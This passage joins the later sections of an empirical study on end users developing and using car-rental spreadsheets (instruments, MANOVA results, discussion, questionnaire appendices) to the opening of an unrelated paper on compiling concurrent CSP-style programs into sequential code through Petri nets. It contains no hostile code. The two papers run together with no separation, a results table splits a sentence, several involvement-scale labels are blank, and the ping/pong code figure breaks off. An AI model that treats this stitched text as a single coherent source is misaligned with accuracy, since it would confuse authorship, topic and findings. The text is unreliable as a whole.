To control for presentation order effects, each participant was randomly assigned to use either their own or the other spreadsheet first. They then used the spreadsheet to answer 10 questions relating to making choices about car rental hire. The time taken to answer these questions was recorded. They then completed a questionnaire containing items to measure: perceived system quality, involvement, user satisfaction and perceived individual impact. Once the questionnaire and their answers to the car rental decision questions were collected, each participant then repeated the process with the other spreadsheet on their floppy disk. A different but equivalent set of car rental decision questions was used. Eighty of the participants ended up using the application they had developed first, and 79 participants used the other application first.
Instruments
The development of the research instruments for this study involved a review of many existing survey instruments. To ensure the reliability and validity of the measures used, previously validated measurement scales were adopted wherever possible. Factor analysis of the items used to measure the constructs that were not directly measured was undertaken to examine discriminant validity of the constructs. Discriminant validity appeared to be satisfactory for all operationalizations except for user satisfaction and perceived individual impact, which were highly correlated (r = 0.95, p < 0.001). However, as these instruments were used in a closely related study on end user success (McGill, Hobbs, & Klobas, 2003) and discriminant validity was demonstrated for that study, a decision was made to accept these operationalizations.
Spreadsheet Application Development Knowledge
Spreadsheet application development knowledge relates to the knowledge that end user developers make use of when developing UDAs. The instrument used to measure spreadsheet development knowledge was based upon an instrument used by McGill and Dixon (2001). That instrument was developed using material from several sources including: Kreie’s (1998) instrument to measure spreadsheet features knowledge; spreadsheet development methodologies from Ronen, Palley and Lucas (1989) and Salchenberger (1993); and Rivard et al.’s (1997) instrument to measure the quality of UDAs. The final instrument contained 25 items. Each item was presented as a multiple choice question with five options. In each case the fifth option was ‘I don’t know’ or ‘I am not familiar with this feature’. Nine of the items related to knowledge about the features and functionality of spreadsheet packages, eight items related to the development process and eight items related to spreadsheet quality assurance. The instrument was shown to be reliable, with a Cronbach’s alpha of 0.78 (Nunnally, 1978).
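The reliability coefficients reported in this section follow the standard Cronbach’s alpha formula. As an illustration only (the scores below are hypothetical, not the study’s responses), the calculation can be sketched as:

```python
from statistics import variance  # sample variance (ddof = 1)

def cronbach_alpha(items):
    """Cronbach's alpha for a list of respondents, each a list of k item scores."""
    k = len(items[0])
    item_vars = [variance([row[j] for row in items]) for j in range(k)]
    total_var = variance([sum(row) for row in items])
    return (k / (k - 1)) * (1 - sum(item_vars) / total_var)

# Hypothetical responses: 6 respondents x 4 Likert items (not the study's data)
scores = [
    [3, 4, 3, 4],
    [5, 5, 4, 5],
    [2, 2, 3, 2],
    [4, 4, 4, 5],
    [1, 2, 2, 1],
    [5, 4, 5, 5],
]
alpha = cronbach_alpha(scores)  # approaches 1 when items covary strongly
```

A scale is conventionally treated as reliable when alpha exceeds about 0.7 (Nunnally, 1978), the benchmark that the 0.78 value above satisfies.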
**Involvement**
The involvement construct was operationalized using Barki and Hartwick’s (1991) instrument. They developed the scale for information systems based on the general involvement scale proposed by Zaichkowsky (1985). The resulting scale is a seven point bi-polar semantic differential scale with 11 items. See Appendix 2 for a list of the questionnaire items used to measure involvement.
The instrument, as used in this study, was shown to be reliable with a Cronbach’s alpha of 0.95 and involvement was created as a composite variable using the factor weights obtained from measurement model development using AMOS 3.6.
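Creating a composite variable from factor weights amounts to a weighted sum of the item scores. A minimal sketch follows; the weights are invented for illustration and are not the weights estimated by AMOS 3.6 in the study:

```python
# Hypothetical factor weights for a 4-item scale (illustrative only,
# not the weights obtained from measurement model development in the study)
weights = [0.82, 0.79, 0.88, 0.75]

def composite_score(responses, weights):
    """Weighted sum of one respondent's item scores."""
    return sum(w * x for w, x in zip(weights, responses))

# One hypothetical respondent's scores on the four items
score = composite_score([6, 5, 6, 4], weights)
```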
**Perceived System Quality**
The items used to measure perceived system quality were obtained from the instrument developed by Rivard et al. (1997) to assess the quality of UDAs. Rivard et al.’s instrument was designed to be suitable for end user developers to complete, yet to be sufficiently deep to capture their perceptions of components of quality. For this study, items that were not appropriate for the applications under consideration (e.g., those specific to database applications) were excluded. Minor adaptations to wording were also made to reflect the environment in which application development and use occurred. The resulting perceived system quality scale consisted of 20 items, each scored on a Likert scale of 1 to 7, where (1) was labeled ‘strongly agree’ and (7) was labeled ‘strongly disagree’. See Appendix 2 for a list of the questionnaire items used to measure perceived system quality.
The instrument was shown to be reliable with a Cronbach’s alpha of 0.94 and perceived system quality was created as a composite variable using the factor weights obtained from measurement model development using AMOS 3.6.
**User Satisfaction**
Given the confounding of user satisfaction with information quality and system quality in some previous studies (Seddon & Kiew, 1996), items measuring only user satisfaction were sought. Seddon and Yip’s (1992) four-item seven-point semantic differential scale that attempts to measure user satisfaction directly was used in this study. A typical item on this scale is ‘How effective is the system?’, measured from (1) ‘effective’ to (7) ‘ineffective’. See Appendix 2 for a list of the questionnaire items used to measure user satisfaction.
The instrument was shown to be reliable with a Cronbach’s alpha of 0.96 and user satisfaction was created as a composite variable using the factor weights obtained from a one factor congeneric measurement model developed using AMOS 3.6.
**Individual Impact**
In this study, it was explicitly recognized that an individual’s perception of the impact of an information system on their performance might not be consistent with other direct measures of individual impact, and hence three measures of individual impact were included in the study. These were individual impact as perceived by the end user, accuracy of decision making, and time taken to answer a set of questions.
Perceived individual impact was measured using items derived from Goodhue and Thompson (1995) in their study on user evaluations of systems as surrogates for objective performance. The instrument was shown to be reliable, with a Cronbach’s alpha of 0.96. See Appendix 2 for a list of the questionnaire items used to measure perceived individual impact.
In addition to the end user’s perception of individual impact, two direct, easily quantifiable, aspects of individual impact were also measured. These were decision accuracy and time taken to answer a set of questions, and were also used by Goodhue, Klein and March (2000) in their study on user evaluations of systems.
Two sets of 10 different but equivalent questions involving the comparison of costs of car rental companies under a variety of scenarios were created. The questions ranged from comparison of the three firms when no excess kilometer charges are imposed through to questions where excesses are applied and basic parameters are assumed to have changed from those given in the original problem description. A typical question is “Which rental company is the cheapest if you wish to hire a car for 6 days and drive approximately 1,500 kilometers with it?” Participants were asked to provide both the name of the cheapest firm and its cost. The questions were piloted by four end users and slight changes made to clarify them. The equivalence of the two sets of questions in terms of difficulty and time to complete was also confirmed by measuring the time taken to answer each set using the four applications created during piloting of the task.
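The decision questions reduce to simple tariff arithmetic. Using the Advantage Car Rentals tariff from the problem statement in Appendix 1 ($35 per day, 100 free kilometers per day, $0.25 per excess kilometer), the cost underlying the example question above can be sketched as follows; the other companies’ tariffs would be evaluated the same way and the cheapest result returned:

```python
def advantage_cost(days, total_km):
    """Advantage Car Rentals: $35/day, 100 free km/day, $0.25/km excess."""
    free_km = 100 * days
    excess_km = max(0.0, total_km - free_km)
    return 35 * days + 0.25 * excess_km

# Example question: hire a car for 6 days and drive approximately 1,500 km.
# 6 * $35 = $210 base, plus (1500 - 600) excess km * $0.25 = $225.
cost = advantage_cost(6, 1500)  # $435.00
```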
RESULTS
Of the 159 participants, 32.7% were male and 67.3% were female (52 males, 107 females). Their ages ranged from 14 to 77 with an average age of 42.7. Participants reported an average of 4.5 years experience using spreadsheets (with a range from 0 to 21 years). One hundred and twelve (70.4%) reported using spreadsheets at work and 92 (57.9%) reported using spreadsheets for personal use.
Table 2 provides descriptive information about each of the variables of interest. Data analysis was undertaken using MANOVA. Pillai’s Trace ($F = 5.45; \text{df} = 6, 306; p < 0.001$) indicated that there was a significant multivariate effect for being the developer. Each of the hypotheses was then addressed using univariate F-tests (see Table 2). As a number of comparisons were being made, the level of significance
<table>
<thead>
<tr>
<th>Variable</th>
<th>Developer + User</th>
<th>User Only</th>
<th>Comparison</th>
</tr>
</thead>
<tbody>
<tr>
<td>Perceived system quality</td>
<td>Mean 4.64<br>Std. dev. 1.27<br>N 157</td>
<td>Mean 3.98<br>Std. dev. 1.48<br>N 156</td>
<td>F = 17.96; p &lt; 0.001</td>
</tr>
<tr>
<td>Involvement</td>
<td>Mean 9.36<br>Std. dev. 2.73<br>N 157</td>
<td>Mean 8.17<br>Std. dev. 3.20<br>N 156</td>
<td>F = 12.42; p &lt; 0.001</td>
</tr>
<tr>
<td>User satisfaction</td>
<td>Mean 4.44<br>Std. dev. 1.86<br>N 157</td>
<td>Mean 3.63<br>Std. dev. 2.07<br>N 156</td>
<td>F = 13.22; p &lt; 0.001</td>
</tr>
<tr>
<td>Perceived individual impact</td>
<td>Mean 9.38<br>Std. dev. 3.94<br>N 157</td>
<td>Mean 7.26<br>Std. dev. 4.30<br>N 156</td>
<td>F = 20.65; p &lt; 0.001</td>
</tr>
<tr>
<td>Number of decisions correct (/10)</td>
<td>Mean 4.43<br>Std. dev. 3.33<br>N 157</td>
<td>Mean 3.47<br>Std. dev. 3.22<br>N 156</td>
<td>F = 6.70; p = 0.010</td>
</tr>
<tr>
<td>Time to make decisions (minutes)</td>
<td>Mean 17.75<br>Std. dev. 10.00<br>N 157</td>
<td>Mean 15.31<br>Std. dev. 7.22<br>N 156</td>
<td>F = 6.10; p = 0.014</td>
</tr>
</tbody>
</table>
Table 2: End user developer perceptions and performance when using their own or another application
was conservatively set at 0.01.
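With two groups, each univariate F-test is a one-way ANOVA. A minimal sketch of the calculation on hypothetical ratings (not the study’s data, whose error degrees of freedom differ) follows:

```python
from statistics import mean

def oneway_f(group_a, group_b):
    """One-way ANOVA F statistic for two groups (df = 1, n_a + n_b - 2)."""
    grand = mean(group_a + group_b)
    # Between-groups sum of squares (1 degree of freedom for two groups)
    ss_between = (len(group_a) * (mean(group_a) - grand) ** 2
                  + len(group_b) * (mean(group_b) - grand) ** 2)
    # Within-groups (error) sum of squares
    ss_within = (sum((x - mean(group_a)) ** 2 for x in group_a)
                 + sum((x - mean(group_b)) ** 2 for x in group_b))
    df_within = len(group_a) + len(group_b) - 2
    return ss_between / (ss_within / df_within)

# Hypothetical quality ratings from the two conditions (illustrative only)
own_app = [5.1, 4.8, 4.6, 5.0, 4.4, 4.9]
other_app = [3.9, 4.1, 3.6, 4.2, 3.8, 4.0]
f_stat = oneway_f(own_app, other_app)
```

A large F relative to the critical value for (1, df_within) degrees of freedom indicates a significant difference between the two conditions.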
End users perceived applications they had developed themselves to be of higher quality than applications developed by other end users. On average, there was a 16.6% difference in perceived quality when the developer was assessing his/her own application. This increase was significant ($F = 17.96; \text{df} = 1, 311; p < 0.001$). End user developers were also significantly more involved with their own applications ($F = 12.42; \text{df} = 1, 311; p < 0.001$) and significantly more satisfied with them ($F = 13.22; \text{df} = 1, 311; p < 0.001$). The average difference in involvement if the user was also the developer was 14.6% and the average difference in user satisfaction was 22.3%. Thus, Hypotheses 1 to 3 were supported.
End users perceived applications they had developed themselves as having a significantly greater impact on their decision performance ($F = 20.65; \text{df} = 1, 311; p < 0.001$), and this was confirmed as they made a significantly larger number of correct decisions ($F = 6.70; \text{df} = 1, 311; p = 0.010$). The average difference in perceived individual impact of the application was 29.2% and the average difference in the number of decisions correct was 27.7%. Thus, Hypotheses 4 and 5 were supported. It was also hypothesized that end user developers would make faster decisions when using the application they had developed themselves. However, this hypothesis was not supported. End users took longer on average to answer the questions using their application ($F = 6.10; \text{df} = 1, 311; p = 0.014$). On average, the difference in decision time was 15.8%.
**DISCUSSION**
The results of this study suggest that the process of developing an application not only predisposes an end user developer to be more satisfied with the application than they would be if it were developed by another end user, but also leads them to perform better with the application than they would if it were developed by another end user. While previous research has established the positive impact of the process of end user development on subjective measures such as involvement (Doll & Torkzadeh, 1989) and user satisfaction (Doll & Torkzadeh, 1989; McGill et al., 1998), its impact on directly measured performance has not previously been established. The results of this study highlight the contribution of the process of application development to application success. This contribution appears to be beyond the advantages achieved by an increased knowledge of the problem situation, as in this study the effects of domain knowledge were controlled for by the within-subjects design. Thus, end user developers benefit not only from better understanding of the problem to be solved (Amoroso, 1988), but also from the process of application development.
The end user developers in this study had significantly higher levels of involvement, user satisfaction and perceived individual impact when using applications they had developed themselves than they did when using applications developed by another end user with approximately the same levels of spreadsheet development knowledge. They also perceived their applications to be of higher system quality. These results are consistent with the results in the literature on user involvement in the development of organizational systems. For example, Doll and Torkzadeh (1988) found user participation in design to be positively correlated with end user computing satisfaction, and Lawrence and Low (1993) found that the more a user felt involved with the development process, the more satisfied they were with the system. The
results are also consistent with McGill et al.'s (1998) study in the end user developer domain, where end user developers were found to be more satisfied with their own applications. The results also strongly support Cheney, Mann and Amoroso's (1986) claim that end user development can be considered as the ultimate user involvement. The higher levels of perceived system quality for end users’ own applications highlight the subjectivity of system quality for end users. This issue has been raised by Huitfeldt and Middleton (2001), who argued that the standard system quality criteria are oriented towards information technology maintenance staff rather than towards end users and that “it is still difficult for an end user, or software development client, to evaluate the quality of the delivered product” (p. 3). Although the instrument used to measure perceived system quality in this study was designed specifically for end users (Rivard et al., 1997), informal feedback from participants suggests they found quality assessment a difficult task. In contrast to ‘software engineering’ definitions of system quality (e.g., Boehm et al., 1978; Cavano & McCall, 1978), Amoroso and Cheney (1992) implicitly acknowledge this difficulty by defining UDA quality as a combination of end user information satisfaction and application utilization. This, however, ignores the underlying necessity for the more technical dimensions of system quality to be taken account of in order to have reliable and maintainable applications.
End user developers made significantly more correct decisions when using their own applications than when using an application developed by another end user. In this study, all participants had also used both the application they had developed and another application, so domain knowledge was not a factor. The improved performance could be due to a greater familiarity with the application itself, achieved through the development process. Successful use of user developed spreadsheet applications appears to require substantial end user knowledge because of the lack of separation of data and processing that is commonly found (Hall, 1996; Ronen et al., 1989). Users of UDAs do not usually receive formal training in the particular application; yet training is associated with successful use (Nelson, 1991). Developing an application allows the user to develop a robust understanding of it that makes it easier to use and makes it possible for them to successfully adjust aspects of it when necessary. The development process can be seen as a form of training for future use of the application, and it can circumvent problems that might otherwise occur because of lack of training and/or documentation.
The improved performance could also be due to a greater determination to achieve the correct answers, because of the higher levels of involvement. This explanation receives support from the additional time user developers spent making the decisions. On average, the user developers spent an extra two-and-a-half minutes trying to answer the 10 questions. This was unexpected, as it would be logical to expect end users to spend less time using the applications they understand best, but may be due to the end user developers’ greater commitment to succeeding with their own applications. Comments from participants during the sessions support this possible explanation. In addition, many participants continued working on their applications once the formal part of the experiment was completed; some even continued to adapt their applications.
McGill et al. (1998) questioned the usefulness of user satisfaction as a measure of UDA success after finding that developers of UDAs were significantly more satisfied with applications they had developed than other end users were with the same applications. They speculated that increased satisfaction might be a reflection of the role of attitude in maintaining self-esteem, and expressed concerns that this increased satisfaction might blind end user developers to problems that exist in the applications they have developed. However, no measures of performance were included in that study. This study suggests that the raised levels of user satisfaction and other perceptual variables were appropriate, as they were consistent with better levels of performance.
Both subjective and direct measures of UDA success have an important role to play in research on user development of applications. Shayo et al. (1999) noted that subjective measures are less threatening and easier to obtain, thus making end user computing research easier to conduct. Subjective measures can also reflect a wider range of success factors than can be captured using direct measures such as decision accuracy. However, exclusive use of subjective measures can be problematic because users are asked to place a value on something about which they may not be objective. By including both types of measures, this study has demonstrated a range of benefits attributable to end user development and has provided a measure of confidence that increases in subjective measures are also associated with increases in some direct measures.
The results of this comparison between end user developers using their own applications and end users using applications developed by other end users have implications for staff movement in organizations. If an end user develops an application for his or her own use, and its use has a positive impact on performance, this does not guarantee that the same will be true if another end user starts to use it. Organizations should recognize that the use of UDAs by end users other than the developer may carry with it greater risks. If an end user developer has developed an application for his or her own use and then leaves the position or organization, it cannot be assumed that another end user will necessarily be able to use it successfully. In addition, if users are developing applications for others to use, particular attention must be paid to ensure that these applications are of sufficient quality for successful use not to rely on additional insight gained during the development process. As previously discussed, the development process provides a form of preparation for future use of an application and may reduce dependence on training and documentation. However, users of a UDA who were not involved in its development still rely heavily on documentation and training, and their importance must be emphasized.
Several limitations of the research are apparent and should be considered in future investigations of end user development success. First, the only application development tool considered was spreadsheets. While spreadsheets have been the most commonly used end user application development tool (Taylor et al., 1998), the generalizability of the results to users of other development tools, such as database management systems and Web development tools, needs to be investigated in future research. A second limitation of the research was the constraints resulting from the use of a laboratory experiment research approach. The spreadsheets that participants developed were probably smaller
than the majority of spreadsheets developed by users in support of organizational decision making (Hall, 1996). In addition, because of the finite nature of the experiment, end users did not have the same incentive to succeed as would be expected in a work situation. The artificial nature of the environment and task may have influenced the results. While the research situation chosen provided the benefit of control of external variability and hence internal validity, it was not ideal in terms of providing external validity. It would be valuable to undertake a field study in a range of organizations to extend the external validity of the research.
CONCLUSION
In conclusion, this study suggests that the process of developing an application leads to significant advantages for the end user developer. In the past, the proposed benefits of user development of applications have mainly been attributed to a belief that the user has a superior understanding of the problem to be solved by the application (Amoroso, 1988). In this study, all end users should have had equal knowledge and understanding of the problem when using both the application they had developed and the other application, so domain knowledge was not a factor.
The relative success of the end user developers when using their own applications in this study may flow from their superior knowledge of their own applications, thus confirming one of the proposed advantages of user involvement in organizational information systems development. The advantage of superior knowledge of the application is likely to be particularly important with spreadsheet applications where data and processing are usually integrated (Hall, 1996; Ronen et al., 1989). Future research should investigate whether these findings also hold when other application development tools are used and with other groups of end user developers.
There have been concerns expressed in the literature that user development of applications is an inefficient use of personnel time, distracting end users from what they are supposed to be doing (Alavi & Weiss, 1985-1986; Davis & Srinivasan, 1988; O’Donnell & March, 1987). However, this study suggests that the potential risk of inefficient use of personnel time may be compensated for by superior decision making later, based upon insights gained from system development. While development of applications by more experienced user developers or by information systems professionals may ensure a more reliable and maintainable application (Edberg & Bowman, 1996), end user development is currently a pervasive form of organizational system development and it is encouraging to identify this benefit of it. However, the findings on differences in end user success between those who have developed the application they are using and those who have not emphasize that organizations should recognize that the use of UDAs by end users other than the developer may carry greater risks, and that these must be addressed by particular attention to documentation of applications and training for other users. It is not appropriate that successful use relies on insight gained during the development process. UDAs must be sufficiently robust and reliable to be used by a wide range of users.
CAR RENTAL PROBLEM
Deciding which car rental company to choose when planning a holiday can be quite difficult. A local consumer group has asked you to set up a spreadsheet to help people make decisions about car rental options. The spreadsheet will enable users to determine which company provides the cheapest option for them, given how long they need to hire a car and how much driving they intend to do.
After investigating the charges of the major companies, you have the following information about the options for hiring a compact size car in Australia.
- Advantage Car Rentals charges $35 per day for up to 100 kilometers per day. Extra driving beyond 100 kilometers per day is charged a $0.25/km excess.
- OnRoad Rentals charges $41 per day. This rate includes 200 free kilometers per day. Extra kilometers beyond that are charged at the rate of $0.30/km.
- Prestige Rent-A-Car charges $64 per day for unlimited kilometers.
Your task is to create a spreadsheet that will allow you or someone else using it to type in the number of days they will need the car and the number of kilometers they expect to drive over the time of the rental. The spreadsheet should then display the rental cost for each of the above three companies.
APPENDIX 1
The problem statement given to participants in Part 2 of the experimental session
APPENDIX 2
Items included in questionnaire to measure end user perceptions
<table>
<thead>
<tr>
<th>Perceived system quality</th>
<th>strongly disagree (1) to strongly agree (7)</th>
</tr>
</thead>
<tbody>
<tr><td>Using the spreadsheet would be easy, even after a long period of not using it</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>Errors in the spreadsheet are easy to identify</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>The spreadsheet increased my data processing capacity</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>The spreadsheet is easy to learn by new users</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>Should an error occur, the spreadsheet makes it straightforward to perform some checking in order to locate the source of error</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>The data entry sections provide the capability to easily make corrections to data</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>The same terminology is used throughout the spreadsheet</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>This spreadsheet does not contain any errors</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>The terms used in the spreadsheet are familiar to users</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>Data entry sections of the spreadsheet are organized so that the different bits of data are grouped together in a logical way</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>The data entry areas clearly show the spaces reserved to record the data</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>The format of a given piece of information is always the same, wherever it is used in the spreadsheet</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>Data is labeled so that it can be easily matched with other parts of the spreadsheet</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>The spreadsheet is broken up into separate and independent sections</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>Use of this spreadsheet would reduce the number of errors you make when choosing a rental car</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>Each section has a unique function or purpose</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>Each section includes enough information to help you understand what it is doing</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>Queries are easy to make</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>The spreadsheet provides all the information required to use the spreadsheet (this is called documentation)</td><td>1 2 3 4 5 6 7</td></tr>
<tr><td>Corrections to errors in the spreadsheet are easy to make</td><td>1 2 3 4 5 6 7</td></tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th colspan="3">Involvement. This car rental spreadsheet is:</th>
</tr>
</thead>
<tbody>
<tr><td>important</td><td>1 2 3 4 5 6 7</td><td>unimportant</td></tr>
<tr><td>needed</td><td>1 2 3 4 5 6 7</td><td>not needed</td></tr>
<tr><td>essential</td><td>1 2 3 4 5 6 7</td><td>nonessential</td></tr>
<tr><td>fundamental</td><td>1 2 3 4 5 6 7</td><td>trivial</td></tr>
<tr><td>significant</td><td>1 2 3 4 5 6 7</td><td>insignificant</td></tr>
<tr><td>means a lot to me</td><td>1 2 3 4 5 6 7</td><td>means nothing to me</td></tr>
<tr><td>exciting</td><td>1 2 3 4 5 6 7</td><td>unexciting</td></tr>
<tr><td></td><td>1 2 3 4 5 6 7</td><td>of no concern to me</td></tr>
<tr><td></td><td>1 2 3 4 5 6 7</td><td>not of interest to me</td></tr>
<tr><td></td><td>1 2 3 4 5 6 7</td><td>irrelevant to me</td></tr>
<tr><td></td><td>1 2 3 4 5 6 7</td><td>doesn’t matter to me</td></tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>User satisfaction</th>
<th></th>
<th>1 2 3 4 5 6 7</th>
<th></th>
</tr>
</thead>
<tbody>
<tr><td>How adequately do you feel the spreadsheet meets your information processing needs when answering car rental queries?</td><td>inadequately</td><td>1 2 3 4 5 6 7</td><td>adequately</td></tr>
<tr><td>How efficient is the spreadsheet?</td><td>inefficient</td><td>1 2 3 4 5 6 7</td><td>efficient</td></tr>
<tr><td>How effective is the spreadsheet?</td><td>ineffective</td><td>1 2 3 4 5 6 7</td><td>effective</td></tr>
<tr><td>Overall, are you satisfied with the spreadsheet?</td><td>dissatisfied</td><td>1 2 3 4 5 6 7</td><td>satisfied</td></tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Perceived individual impact</th>
<th></th>
<th>1 2 3 4 5 6 7</th>
<th></th>
</tr>
</thead>
<tbody>
<tr><td>The spreadsheet has a large, positive impact on my effectiveness and productivity in answering car rental queries</td><td>disagree</td><td>1 2 3 4 5 6 7</td><td>agree</td></tr>
<tr><td>The spreadsheet is an important and valuable aid to me in answering car rental queries</td><td>disagree</td><td>1 2 3 4 5 6 7</td><td>agree</td></tr>
</tbody>
</table>
Tanya McGill is a senior lecturer in the School of Information Technology at Murdoch University in Western Australia. She has a PhD from Murdoch University. Her major research interests include end user computing and information technology education. Her work has appeared in various journals including the Information Resources Management Journal, Journal of Research on Computing in Education, European Journal of Psychology of Education, Journal of the American Society for Information Science, and Journal of End User Computing.
Compiling concurrent programs for embedded sequential execution
Bill Lin
Electrical and Computer Engineering Department, University of California, San Diego, La Jolla, CA 92093-0407, USA
Abstract
Embedded applications are often more naturally modeled as a set of concurrent tasks, yet they are often implemented using a single embedded processor. Traditionally, run-time operating systems have been used to simulate concurrency by timesharing the underlying processor and to facilitate inter-process communication amongst the concurrent tasks. However, this run-time approach to multi-tasking and inter-process communication can introduce significant overhead in execution time and memory requirements, prohibitive in many cases for embedded applications where processor and memory resources are scarce. In this paper, we present compilation techniques that can statically resolve concurrency at compile-time so that the resulting code produced can be sequentially executed on an embedded processor without the need for a run-time scheduler. Our techniques are based on a novel Petri net theoretic framework. In particular, we show how a concurrent program specification can be transformed into an intermediate Petri net representation. We then show how the intermediate Petri net may be statically scheduled to produce a sequential state machine model that can be executed directly on an embedded processor without a run-time operating system. In practice, this technique produces efficient results. However, theoretically, it is possible for the resulting state machine to become very large, resulting in code explosion. To circumvent this limitation, we describe a compositional approach that can scale well to large applications and is immune to code explosion.
© 2006 Published by Elsevier B.V.
1. Introduction
Software is playing an increasingly important role in embedded systems. This trend is being driven by a wide spectrum of embedded applications, ranging from personal communications systems, to consumer electronics, to automotive, each forming a highly competitive segment of the embedded systems market. In many cases, the software runs on a processor core that is integrated as part of a VLSI chip.
While high-level language compilers exist for implementing sequential programs on embedded processors [1–5], e.g. starting from C, and improved compilers are emerging for digital signal processing (DSP) oriented architectures and in-house application-specific instruction-set processors (ASIPs) [4,5], many embedded software applications are more naturally expressed as concurrent programs, specified in terms of communicating processes. This is because actual system applications are typically composed of multiple tasks. Communicating processes have several attractive properties: they provide a modular way of capturing concurrent behavior, they provide a high-level abstraction for data communication and synchronization, they can be hierarchically composed to form larger systems, and they define a natural level of granularity for partitioning over different distributed hardware–software architectures.
Currently, the most widely deployed solution is to use an embedded operating system to manage the run-time scheduling of processes and inter-process communication. However, this solution can introduce significant overhead in execution time and memory requirements. The execution time overhead is prohibitive in embedded applications where performance is paramount. The memory overhead often translates directly to silicon cost for many system-on-a-chip applications where the program and data memories are partly on-chip. A handcrafted solution is another commonly used approach, where concurrent programs are manually rewritten as a sequential program by the designer. This approach is tedious, time consuming, and error prone.
Several alternative high-level approaches have been proposed. Static data-flow solutions [6–8], successfully used to design DSP-oriented systems, achieve compile-time scheduling at the expense of disallowing conditional and non-deterministic execution. Other researchers have considered hybrid approaches [9,10] that generate application-specific run-time schedulers to handle the multi-tasking of conditional and non-deterministic computations. Another important body of work is based on a reactive synchronous specification model [11–13]. These compilation techniques are based on a strong synchrony hypothesis that makes two fundamental assumptions: the existence of a global clock abstraction to discretize computation over instances, and computation conceptually takes no time within each instance. In contrast, our work is based on a model of asynchrony where the concurrent parts can evolve independently and only synchronize where specified.
In this paper, we present new compilation techniques that can generate efficient sequential code from asynchronous process-based program specifications. The resulting sequential code generated can be executed on an embedded processor without the need for a run-time scheduler. The input specification is captured in a C-like programming language that has been extended with mechanisms for concurrency and communication. These extensions are based on the model of Communicating Sequential Processes (CSP), as defined by Hoare [14]. This program specification is described in Section 2. From the input program, an intermediate interpreted Petri net representation is first constructed. This intermediate representation is discussed in Section 3.
A key advantage of this intermediate construction is that the ordering relations across process boundaries are made explicit in the derived Petri net model. Our compilation approach makes use of this partial order information to statically schedule the Petri net to produce a sequential state machine model that can be sequentially executed directly on an embedded processor without a run-time operating system. The sequential state machine produced may be represented as an ordinary C program, which can then be readily retargeted to different processors using processor-specific code generators. Process-level concurrency is statically compiled away while retaining as much partial order information as possible so that maximal freedom is given to the subsequent code generation tools to optimize the scheduling of instructions. This Petri net theoretic compilation method is detailed in Section 4.
In practice, this method produces efficient results. However, theoretically, it is possible for the resulting state machine to become very large, resulting in code explosion. To circumvent this limitation, we describe a compositional approach that first transforms the initial input specification into a set of interacting Petri net components. We then apply the same static scheduling method on each Petri net component to produce a corresponding state machine. The resulting set of interacting state machines are then mapped into a single sequential C program for further processor-specific code generation. In the degenerate case, each process in the initial input specification is mapped into a separate Petri net component. In this case, the size of the resulting sequential code is directly proportional to the size of the original concurrent specification. Thus, this technique can scale well to large applications and is immune to code explosion. This compositional method is detailed in Section 5. The degenerate case is discussed in Section 6.
Finally, in Section 7, we present experimental results to demonstrate the potentials for significant improvements over current run-time solutions.
2. Programming model
In this work, we use a process-based specification as the user-level programming model. Our programming model looks like a C program: the syntactic structure and expression syntax are nearly identical. However, our programming model provides language mechanisms not found in C for specifying processes and channel communications, based on the CSP formalism [14]. In addition to its expressive power to handle parallelism and communication, CSP has a rigorously defined semantics along with a well-defined algebra to reason about concurrent behavior, which lends itself well to formal verification. This section presents a brief overview of our programming model by means of examples.
Our programs are hierarchically composed of processes that communicate through synchronizing channels. A simple program is illustrated in Fig. 1. This example is composed of two processes called ping and pong.
```c
/* this is a process */
ping (input chan(int) a, output chan(int) b)
{
    int x;
    for (;;) {
        x = <-a;            /* receive */
        if (x < 100) x = 10 - x;
        else         x = 10 + x;
        b <= x;             /* send */
    }
}

/* this is another process */
pong (input chan(int) c, output chan(int) d)
```
Fig. 1. Process model.
3. Intermediate representation
Our compilation techniques use an interpreted Petri net model as its intermediate representation. In this section, we first provide basic definitions and classification of Petri nets. We then informally, by means of examples, illustrate how an intermediate Petri net representation may be hierarchically constructed from a program of communicating processes.
3.1. Petri nets
Let $G = (P, T, F, m_0)$ be a Petri net [15], where $P$ is a set of places, $T$ is a set of transitions, $F \subseteq (P \times T) \cup (T \times P)$ is the flow relation, and $m_0 : P \rightarrow N$ is the initial marking, where $N$ is the set of natural numbers.
The symbols $\bullet t$ and $t \bullet$ define, respectively, the set of input places and the set of output places of transition $t$. Similarly, $\bullet p$ and $p \bullet$ define, respectively, the set of input transitions and the set of output transitions of place $p$.
A place $p$ is called a conflict place if it has more than one output transition. Two transitions, $t_i$ and $t_j$, are said to be in conflict, denoted by $t_i \# t_j$, if and only if $\bullet t_i \cap \bullet t_j \neq \emptyset$.
A state, or marking, $m : P \rightarrow N$, is an assignment of a non-negative integer to each place. $m(p)$ denotes the number of tokens in the place $p$. A transition $t$ can fire at marking $m_1$ if all its input places contain at least one token. The firing of $t$ removes one token from each of its input places and adds a new token to each of its output places, leading to a new marking $m_2$. This firing is denoted by $m_1 \rightarrow m_2$.
Given a Petri net $G$, the reachability set of $G$ is the set of all markings reachable in $G$ from the initial marking $m_0$ via the reflexive transitive closure of the above firing relation. The corresponding graphical representation is called a reachability graph.
A Petri net $G$ is said to be safe if in every reachable marking, there is at most one token in any place. In this case, we can simply represent each marking $m : P \rightarrow \{0, 1\}$ as a binary assignment.
3.2. Classes of Petri nets
A Marked Graph (MG) is a net $G = (P, T, F, m_0)$ such that $\forall p \in P : |\bullet p| = 1 = |p \bullet|$. MGs cannot model conflicts.
